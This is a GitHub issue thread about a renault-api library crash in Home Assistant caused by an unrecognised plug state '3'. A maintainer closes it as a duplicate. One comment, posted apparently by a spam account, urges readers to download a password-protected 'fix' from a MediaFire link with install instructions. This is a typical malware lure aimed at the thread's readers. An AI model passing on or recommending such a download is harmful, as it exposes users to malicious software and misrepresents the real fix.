### ISSUE TITLE
From HA : renault_api.kamereon.exceptions.KamereonException: Unable to convert `3` to PlugState.

### ISSUE THREAD

**Issue by tmenguy** [hacf-fr/renault-api#1303] opened 2024-08-27 08:49 UTC
Hi,

From latest HA integration (so on this lib 2.5.0) I got this as a crash in my HA logs... seems there is a new plug state in town:
File "/usr/src/homeassistant/homeassistant/components/renault/sensor.py", line 109, in _get_plug_state_formatted
    plug_status = data.get_plug_status() if data else None
                  ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/renault_api/kamereon/models.py", line 384, in get_plug_status
    raise exceptions.KamereonException(
renault_api.kamereon.exceptions.KamereonException: Unable to convert `3` to PlugState.

Opened it also on the HA part : https://github.com/home-assistant/core/issues/124682

BR
Thomas

**Comment by epenet** [comment] 2024-08-27 08:50
Duplicate of #1262

**Comment by MirsonMboa** [comment] 2024-08-27 08:51
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Closed by epenet** 2024-08-27 08:50 UTC
